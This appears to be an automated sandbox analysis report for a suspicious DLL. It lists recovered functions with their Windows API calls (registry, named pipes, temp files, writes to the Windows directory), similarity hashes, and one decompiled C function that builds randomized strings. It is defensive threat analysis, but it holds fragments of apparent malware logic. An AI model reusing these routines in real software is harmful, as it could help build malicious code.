                  • Part of subcall function 046DB89D: HeapFree.KERNEL32(00000000,?,?,?,?,046C140C,?), ref: 046DB9EB
                  • Part of subcall function 046DB89D: HeapFree.KERNEL32(00000000,?,?,?,?,046C140C,?), ref: 046DB9FB
                  • Part of subcall function 046DB89D: RegCloseKey.ADVAPI32(?,?,?,?,046C140C,?), ref: 046DBA04
                • lstrcmp.KERNEL32(?,00000000), ref: 046D1607
                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,046C133F,00000000,00000000), ref: 046D1633
                • GetCurrentThreadId.KERNEL32 ref: 046D16E4
                • GetCurrentThread.KERNEL32 ref: 046D16F5
                • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,046DA46B,046C133F,00000001,74E5F730,00000000,00000000), ref: 046D1732
                • HeapFree.KERNEL32(00000000,?,?,?,00000000,?,046DA46B,046C133F,00000001,74E5F730,00000000,00000000), ref: 046D1746
                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 046D1754
                • wsprintfA.USER32 ref: 046D176C
                  • Part of subcall function 046C3FF7: lstrlen.KERNEL32(046C158F,00000000,046E6C5B,00000000,046E4160,046C158F,?,?,046DCD80,?,046C159F,046C158F,00000000,0000000B,?,046C158F), ref: 046C4001
                  • Part of subcall function 046C3FF7: lstrcpy.KERNEL32(00000000,046C158F), ref: 046C4025
                  • Part of subcall function 046C3FF7: StrRChrA.SHLWAPI(046C158F,00000000,0000002E,?,00000003,?,?,046DCD80,?,046C159F,046C158F,00000000,0000000B,?,046C158F,046C158F), ref: 046C402C
                  • Part of subcall function 046C3FF7: lstrcat.KERNEL32(00000000,?), ref: 046C4083
                • lstrlen.KERNEL32(00000000,00000000), ref: 046D1777
                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 046D178E
                • HeapFree.KERNEL32(00000000,00000000), ref: 046D179F
                • HeapFree.KERNEL32(00000000,?), ref: 046D17AB
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                • String ID:
                • API String ID: 773763258-0
                • Opcode ID: 5638d19234823d52355b3f7eb5d80cb2c8d416354806d5717f53b567ead824e5
                • Instruction ID: 03367e4372cb0aabb5e298cc69279b843cafb405a28fda841bdceb37b6de3afe
                • Opcode Fuzzy Hash: 5638d19234823d52355b3f7eb5d80cb2c8d416354806d5717f53b567ead824e5
                • Instruction Fuzzy Hash: F871F175E00219EFDB11DFA6DC849EEBBF9FB09304F044069E504AB220E775AD51DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D5BD8 Relevance: 18.2, APIs: 12, Instructions: 183synchronizationstringthreadCOMMON
                Download Yara Rule
                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 046D5BFF
                • memcpy.NTDLL(?,?,00000010), ref: 046D5C22
                • memset.NTDLL ref: 046D5C6E
                • lstrcpyn.KERNEL32(?,?,00000034), ref: 046D5C82
                • GetLastError.KERNEL32 ref: 046D5CB0
                • GetLastError.KERNEL32 ref: 046D5CF7
                • GetLastError.KERNEL32 ref: 046D5D16
                • WaitForSingleObject.KERNEL32(?,000927C0), ref: 046D5D50
                • WaitForSingleObject.KERNEL32(?,00000000), ref: 046D5D5E
                • GetLastError.KERNEL32 ref: 046D5DD8
                • ReleaseMutex.KERNEL32(?), ref: 046D5DEA
                • RtlExitUserThread.NTDLL(?), ref: 046D5E00
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
                • String ID:
                • API String ID: 4037736292-0
                • Opcode ID: 8c9536e34212ccee6df06126185b71f71f63df260496cd30092f295b7d509b87
                • Instruction ID: 29d4801285bc86af742044fffa10b3ab25ff395487092dbeb22671cd30084db6
                • Opcode Fuzzy Hash: 8c9536e34212ccee6df06126185b71f71f63df260496cd30092f295b7d509b87
                • Instruction Fuzzy Hash: 4C614971904301AFD720AF268808A2BB7E9FF98711F008A1EF597D7680F774E905CB66
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D5628 Relevance: 18.2, APIs: 12, Instructions: 179synchronizationpipethreadCOMMON
                Download Yara Rule
                APIs
                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 046D565A
                • WaitForSingleObject.KERNEL32(0000043C,00000000), ref: 046D567C
                • ConnectNamedPipe.KERNEL32(?,?), ref: 046D569C
                • GetLastError.KERNEL32 ref: 046D56A6
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 046D56CA
                • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 046D570D
                • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 046D5716
                • WaitForSingleObject.KERNEL32(00000000), ref: 046D571F
                • CloseHandle.KERNEL32(?), ref: 046D5734
                • GetLastError.KERNEL32 ref: 046D5741
                • CloseHandle.KERNEL32(?), ref: 046D574E
                • RtlExitUserThread.NTDLL(000000FF), ref: 046D5764
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                • String ID:
                • API String ID: 4053378866-0
                • Opcode ID: 5ff886aadd0c43736f066929733861991eec236a3b4112491264c6e383ec4296
                • Instruction ID: 74d93d6bc9894126e53a2057510a56279ef35d310859f9d46ae4683384e30861
                • Opcode Fuzzy Hash: 5ff886aadd0c43736f066929733861991eec236a3b4112491264c6e383ec4296
                • Instruction Fuzzy Hash: 1551E330A54280FFD7129F34C8445BA7BA6FB56324B28195DF0D3CB6A1F734AD028B59
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D886D Relevance: 18.1, APIs: 12, Instructions: 136stringmemoryCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(00000000,74E05520,?,00000000,?,?,046CD1E1), ref: 046D8883
                • lstrlen.KERNEL32(?), ref: 046D888B
                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 046D889B
                • lstrcpy.KERNEL32(00000000,?), ref: 046D88BA
                • lstrlen.KERNEL32(?), ref: 046D88CF
                • lstrlen.KERNEL32(?), ref: 046D88DD
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 046D892B
                • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 046D894F
                • lstrlen.KERNEL32(?), ref: 046D8982
                • HeapFree.KERNEL32(00000000,?,?), ref: 046D89AD
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 046D89C4
                • HeapFree.KERNEL32(00000000,?,?), ref: 046D89D1
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                • String ID:
                • API String ID: 904523553-0
                • Opcode ID: 202826d3266f62a23902d2fb605c5f39e1db66090e2593df344d36937747bf90
                • Instruction ID: 98983e45bf6cc8d741eefbd335f4830f6ed691baa27b7f4a3d0de4604cc35938
                • Opcode Fuzzy Hash: 202826d3266f62a23902d2fb605c5f39e1db66090e2593df344d36937747bf90
                • Instruction Fuzzy Hash: 18417A71D0020ABFDF12AFA5CC48AAE7BB5FB84354F104025E9659B250E731E951DF60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C99F5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120memorythreadstringCOMMON
                Download Yara Rule
                APIs
                • RtlImageNtHeader.NTDLL(00000000), ref: 046C9A1F
                • GetCurrentThreadId.KERNEL32 ref: 046C9A35
                • GetCurrentThread.KERNEL32 ref: 046C9A46
                  • Part of subcall function 046D0D54: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D66
                  • Part of subcall function 046D0D54: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D7F
                  • Part of subcall function 046D0D54: GetCurrentThreadId.KERNEL32 ref: 046D0D8C
                  • Part of subcall function 046D0D54: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D98
                  • Part of subcall function 046D0D54: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0DA6
                  • Part of subcall function 046D0D54: lstrcpy.KERNEL32(00000000), ref: 046D0DC8
                  • Part of subcall function 046D2295: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,74E05520,00000000,?,046C9A90,00000020,00000000,?,00000000), ref: 046D2300
                  • Part of subcall function 046D2295: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,74E05520,00000000,?,046C9A90,00000020,00000000,?,00000000), ref: 046D2328
                • HeapFree.KERNEL32(00000000,?,?,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 046C9AC0
                • HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 046C9ACC
                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 046C9B1B
                • wsprintfA.USER32 ref: 046C9B33
                • lstrlen.KERNEL32(00000000,00000000), ref: 046C9B3E
                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 046C9B55
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                • String ID: W
                • API String ID: 630447368-655174618
                • Opcode ID: ca2161513521e98c0a32ce0f95028e42dabce7a2fca3bbedd6a8e7f41c2488a0
                • Instruction ID: 62af9e6ea80d9b075c8965882d01b500ae537641cd92f05fab1dfd83940a0ec4
                • Opcode Fuzzy Hash: ca2161513521e98c0a32ce0f95028e42dabce7a2fca3bbedd6a8e7f41c2488a0
                • Instruction Fuzzy Hash: DD415EB1A01119FFDB11EFA2DD48DAE7BB9FF48344B104029F8059A210F735AA64DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C46C9 Relevance: 16.7, APIs: 11, Instructions: 155registrystringfileCOMMON
                Download Yara Rule
                APIs
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 046C46F4
                  • Part of subcall function 046C4B8D: RegCloseKey.ADVAPI32(?,?,?,046E5181,00000000,00000000,00000000), ref: 046C4C14
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 046C472F
                • lstrcpyW.KERNEL32(-00000002,?), ref: 046C4790
                • lstrcatW.KERNEL32(00000000,?), ref: 046C47A5
                • lstrcpyW.KERNEL32(?), ref: 046C47BF
                • lstrcatW.KERNEL32(00000000,?), ref: 046C47CE
                  • Part of subcall function 046C8D95: lstrlenW.KERNEL32(?,?,?,046D71F4,?,?,?,?,00001000,?,?,00001000), ref: 046C8DA8
                  • Part of subcall function 046C8D95: lstrlen.KERNEL32(?,?,046D71F4,?,?,?,?,00001000,?,?,00001000), ref: 046C8DB3
                  • Part of subcall function 046C8D95: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 046C8DC8
                • RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 046C4838
                  • Part of subcall function 046E2531: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,046E523E,?), ref: 046E253D
                  • Part of subcall function 046E2531: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,046E523E,?), ref: 046E2565
                  • Part of subcall function 046E2531: memset.NTDLL ref: 046E2577
                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?), ref: 046C486D
                • GetLastError.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?), ref: 046C4878
                • HeapFree.KERNEL32(00000000,00000000), ref: 046C488E
                • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?), ref: 046C48A0
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
                • String ID:
                • API String ID: 1430934453-0
                • Opcode ID: 3d13ac23268c3c0c3beedaf6f5b30cce6cd497b06f84900c77d8e58be315775c
                • Instruction ID: 5b39793ec8bc9adc10fed669f8520779821b1f366b38f8630f03976f6f00f969
                • Opcode Fuzzy Hash: 3d13ac23268c3c0c3beedaf6f5b30cce6cd497b06f84900c77d8e58be315775c
                • Instruction Fuzzy Hash: F451297190120AEFDB11EFA1DD54EAE77FDEF44244B14106AE901AB250FB35EE019B61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C13964 Relevance: 16.6, APIs: 11, Instructions: 145stringCOMMON
                Download Yara Rule
                C-Code - Quality: 55%
                			E01C13964(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				WCHAR* _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				WCHAR* _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				WCHAR* _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				WCHAR* _t125;

				_t58 =  *0x1c1a39c; // 0x2179818
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E01C153B5();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E01C153B5();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E01C14A66(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E01C14A66(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E01C16E0E(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x1c191ac;
						}
						_t70 = E01C13692(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E01C12114(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x1c1a2d8; // 0x55d5a8
								_t28 = _t105 + 0x1c1bb10; // 0x530025
								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E01C16E0E(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x1c191b0;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E01C12114(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E01C12C11(_v24);
								} else {
									_t92 =  *0x1c1a2d8; // 0x55d5a8
									_t44 = _t92 + 0x1c1bc88; // 0x73006d
									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E01C12C11(_v8);
						}
						E01C12C11(_v12);
					}
					E01C12C11(_v16);
				}
				return _v28;
			}


































                0x01c1396a
                0x01c13972
                0x01c13975
                0x01c13982
                0x01c13985
                0x01c1398c
                0x01c13993
                0x01c13996
                0x01c139a3
                0x01c139a6
                0x01c139a9
                0x01c139b0
                0x01c139b3
                0x01c139bb
                0x01c139c2
                0x01c139c5
                0x01c139cb
                0x01c139cf
                0x01c139d8
                0x01c139dc
                0x01c139de
                0x01c139de
                0x01c139e6
                0x01c139ed
                0x01c139f0
                0x01c139f6
                0x01c139fd
                0x01c13a0e
                0x01c13a15
                0x01c13a27
                0x01c13a2e
                0x01c13a31
                0x01c13a3a
                0x01c13a4c
                0x01c13a62
                0x01c13a67
                0x01c13a6b
                0x01c13a6f
                0x01c13a76
                0x01c13a79
                0x01c13a7b
                0x01c13a7b
                0x01c13a85
                0x01c13a8e
                0x01c13a95
                0x01c13ab1
                0x01c13ab5
                0x01c13aee
                0x01c13ab7
                0x01c13aba
                0x01c13ac2
                0x01c13ad3
                0x01c13adb
                0x01c13ae3
                0x01c13ae7
                0x01c13ae7
                0x01c13ab5
                0x01c13af6
                0x01c13af6
                0x01c13afe
                0x01c13afe
                0x01c13b06
                0x01c13b06
                0x01c13b12

                APIs
                • GetTickCount.KERNEL32 ref: 01C1397C
                • lstrlen.KERNEL32(00000000,00000005), ref: 01C139FD
                • lstrlen.KERNEL32(?), ref: 01C13A0E
                • lstrlen.KERNEL32(00000000), ref: 01C13A15
                • lstrlenW.KERNEL32(80000002), ref: 01C13A1C
                • wsprintfW.USER32 ref: 01C13A62
                • lstrlen.KERNEL32(?,00000004), ref: 01C13A85
                • lstrlen.KERNEL32(?), ref: 01C13A8E
                • lstrlen.KERNEL32(?), ref: 01C13A95
                • lstrlenW.KERNEL32(?), ref: 01C13A9C
                • wsprintfW.USER32 ref: 01C13AD3
                  • Part of subcall function 01C12C11: RtlFreeHeap.NTDLL(00000000,00000000,01C17013,00000000,?,?,00000000), ref: 01C12C1D
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$wsprintf$CountFreeHeapTick
                • String ID:
                • API String ID: 822878831-0
                • Opcode ID: e31cc26d660b50d6f62031667ad255b233bb171d69b8d98e4c7aa16f3ef92bd8
                • Instruction ID: 065519e43afcbcb46c88dd6ab73cb058200ef30d6518d247ac5b0cd1b5108db6
                • Opcode Fuzzy Hash: e31cc26d660b50d6f62031667ad255b233bb171d69b8d98e4c7aa16f3ef92bd8
                • Instruction Fuzzy Hash: DB519D32D80119EBCF11AFA4CC45ADE7BB1FF46314F154064EA08A7254DB75CA11EBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E44DD Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 046E4513
                • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 046E4528
                • RegCreateKeyA.ADVAPI32(80000001,?), ref: 046E4550
                • HeapFree.KERNEL32(00000000,00000001), ref: 046E4591
                • HeapFree.KERNEL32(00000000,?), ref: 046E45A1
                • RtlAllocateHeap.NTDLL(00000000,046C5114), ref: 046E45B4
                • RtlAllocateHeap.NTDLL(00000000,046C5114), ref: 046E45C3
                • HeapFree.KERNEL32(00000000,?,?,046C5114,?,00000001,?,?), ref: 046E460D
                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,046C5114,?,00000001), ref: 046E4631
                • HeapFree.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,?,046C5114,?,00000001), ref: 046E4656
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,046C5114,?,00000001), ref: 046E466B
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$Allocate$CloseCreate
                • String ID:
                • API String ID: 4126010716-0
                • Opcode ID: 32e2becbdd1eeb6af2441001bad085c5ccc9e9961990e2ba8e1a07d64de83687
                • Instruction ID: 8ec8fe768f8228f095f4390ede2815c82620da302d76f805982b3a4dd50cacbd
                • Opcode Fuzzy Hash: 32e2becbdd1eeb6af2441001bad085c5ccc9e9961990e2ba8e1a07d64de83687
                • Instruction Fuzzy Hash: A751BEB5D01209EFDF01DFA6D8848EEBBB9FB08344B10506AE504A6210EB366E95DF60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DD83A Relevance: 16.6, APIs: 11, Instructions: 94memoryregistrystringCOMMON
                Download Yara Rule
                APIs
                • RtlImageNtHeader.NTDLL(?), ref: 046DD84B
                • GetTempPathA.KERNEL32(00000000,00000000,?,?,046DA83B,00000094,00000000,00000000,?), ref: 046DD863
                • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 046DD872
                • GetTempPathA.KERNEL32(00000001,00000000,?,?,046DA83B,00000094,00000000,00000000,?), ref: 046DD885
                • GetTickCount.KERNEL32 ref: 046DD889
                • wsprintfA.USER32 ref: 046DD8A0
                • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 046DD8DB
                • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 046DD8F8
                • lstrlen.KERNEL32(00000000), ref: 046DD902
                • RegCloseKey.ADVAPI32(?), ref: 046DD91E
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000001,00000000,?), ref: 046DD92C
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTicklstrlenwsprintf
                • String ID:
                • API String ID: 1404517112-0
                • Opcode ID: 10dff07e2f4409ae6ec0751f721d2cd016536533fd26fbf624afc9ec4e26aafd
                • Instruction ID: 06c778ef26aa151936aa2a9477a40d9785e4f4c9d6bc63c8902c4fca523c45c8
                • Opcode Fuzzy Hash: 10dff07e2f4409ae6ec0751f721d2cd016536533fd26fbf624afc9ec4e26aafd
                • Instruction Fuzzy Hash: AF31497190110AFFDB11AFA6DC88DAB7BECEB45354B005025F909DB200F73A9E459BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CFEBD Relevance: 16.6, APIs: 11, Instructions: 80memoryfileCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 046CFED4
                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,046DA9D7,00000094,00000000,00000001,00000094,00000000,00000000,?,046C78A1,00000000,00000094), ref: 046CFEE6
                • StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,046DA9D7,00000094,00000000,00000001,00000094,00000000,00000000,?,046C78A1,00000000,00000094), ref: 046CFEF3
                • wsprintfA.USER32 ref: 046CFF0E
                • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,046C78A1,00000000,00000094,00000000), ref: 046CFF24
                • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 046CFF3D
                • WriteFile.KERNEL32(00000000,00000000), ref: 046CFF45
                • GetLastError.KERNEL32 ref: 046CFF53
                • CloseHandle.KERNEL32(00000000), ref: 046CFF5C
                • GetLastError.KERNEL32(?,00000000,?,046DA9D7,00000094,00000000,00000001,00000094,00000000,00000000,?,046C78A1,00000000,00000094,00000000), ref: 046CFF6D
                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,046DA9D7,00000094,00000000,00000001,00000094,00000000,00000000,?,046C78A1,00000000,00000094), ref: 046CFF7D
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                • String ID:
                • API String ID: 3873609385-0
                • Opcode ID: 40033a7187431470bbbb8debb7df957731a6020b03af97e7c51dc97dda906bf1
                • Instruction ID: 9a9f8bc57d5b01574ef6ac92ab6097bf1ef750d693e8e875fdb0581f81c95fa9
                • Opcode Fuzzy Hash: 40033a7187431470bbbb8debb7df957731a6020b03af97e7c51dc97dda906bf1
                • Instruction Fuzzy Hash: 04112171140208BFE3217B22EC8CF7B3BDDEB42359F041029F906DB280FA685D4186B0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D1447 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112memorystringCOMMON
                Download Yara Rule
                APIs
                • StrChrA.SHLWAPI(00000000,0000002C,7673D3B0,00000000,74E05520,74E5F710), ref: 046D1478
                • StrChrA.SHLWAPI(00000001,0000002C), ref: 046D148B
                • StrTrimA.SHLWAPI(00000000,?), ref: 046D14AE
                • StrTrimA.SHLWAPI(00000001,?), ref: 046D14BD
                • lstrlen.KERNEL32(00000000), ref: 046D14F2
                • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 046D1505
                • lstrcpy.KERNEL32(00000004,00000000), ref: 046D1523
                • HeapFree.KERNEL32(00000000,00000000,00000001,00000000,-00000005,00000001), ref: 046D1547
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                • String ID: W
                • API String ID: 1974185407-655174618
                • Opcode ID: dea7830ca894d75593e1e0413af9030d74f4f63bfc49141f0b564372731711a0
                • Instruction ID: b991c6ec2ae1ae0289246923bfccad14e6bbbb2bb7b5d9bfdbec6ff782188f48
                • Opcode Fuzzy Hash: dea7830ca894d75593e1e0413af9030d74f4f63bfc49141f0b564372731711a0
                • Instruction Fuzzy Hash: D0317E75D10215FFDB109FA5C848AAA7BF8EF49740F14505AF8059B200F7B9EE41CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D793B Relevance: 15.2, APIs: 10, Instructions: 186stringmemoryCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(04C9BFB0,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 046D795E
                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 046D796D
                • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 046D797A
                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 046D7992
                • lstrlen.KERNEL32(0000000D,00000000,00000000,00000000,00000000,00000000,00000000), ref: 046D799E
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046D79BA
                • wsprintfA.USER32 ref: 046D7A9C
                • memcpy.NTDLL(00000000,?,?), ref: 046D7AE9
                • InterlockedExchange.KERNEL32(046EE1A8,00000000), ref: 046D7B07
                • HeapFree.KERNEL32(00000000,00000000), ref: 046D7B48
                  • Part of subcall function 046D265B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 046D2684
                  • Part of subcall function 046D265B: memcpy.NTDLL(00000000,?,?), ref: 046D2697
                  • Part of subcall function 046D265B: RtlEnterCriticalSection.NTDLL(046EE4A8), ref: 046D26A8
                  • Part of subcall function 046D265B: RtlLeaveCriticalSection.NTDLL(046EE4A8), ref: 046D26BD
